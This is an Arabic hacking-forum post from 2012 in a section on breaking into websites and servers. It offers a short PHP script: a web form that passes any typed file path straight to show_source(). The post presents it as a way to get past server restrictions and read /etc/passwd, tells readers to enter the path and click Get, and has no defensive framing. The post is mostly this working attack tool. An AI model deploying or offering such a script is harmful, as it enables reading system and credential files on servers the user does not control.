التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات

 
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 06-07-2012, 08:21 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
إحصائية العضو






ViRuS_BaGhDaD غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
ViRuS_BaGhDaD is on a distinguished road

افتراضي Bypass Read /etc/passwd Via show_source Function


الـسـلام عـلـيـكـم ورحـمـة الله وبـركـاتــه

مثل ما موضح بعنوان الموضوع

Bypass Read /etc/passwd By show_source Function

تخطي قرائه ملف /etc/passwd عن طريق داله الـ ()show_source

كتبت لكم كود بسيط جدا وبنفس الوقت احيانا يفيد في تخطي منع قرائه اليوزرات

ديناميكيه الكود تعتمد على استغلال احدى ثغرات السيرفر وهالداله نادرا ما يتم منعها في السيرفر

يعني ان شاء الله راح تضبط معاكم بنسبه 70%

والكود كمان بسيط جدا

كود PHP:
<title>Read /etc/passwd</title>
<font face="Times New Roman" size="6">BY Cyb3r-R00T</font><br />
<form method="POST" action="">
<p>
<input type="text" name="passwd" size="20">
<input type="submit" value="Get" name="B1">
</p>
</form>
<?
$sec 
$_POST['passwd'];
if (
$sec){
show_source ("$sec");
}
?>
ما يحتاج شرح

فقط ضع الملف الي تريد تقرا في المربع واضغط على Get !

وطبعا الملف راح يكون

/etc/passwd

اي استفسار جاهز

المــصــدر

http://www.sec-art.net/forum/231/

تحياتي للجميع.



Bypass Read LetcLpasswd Via show_source Function

   

رد مع اقتباس
 

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 08:06 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0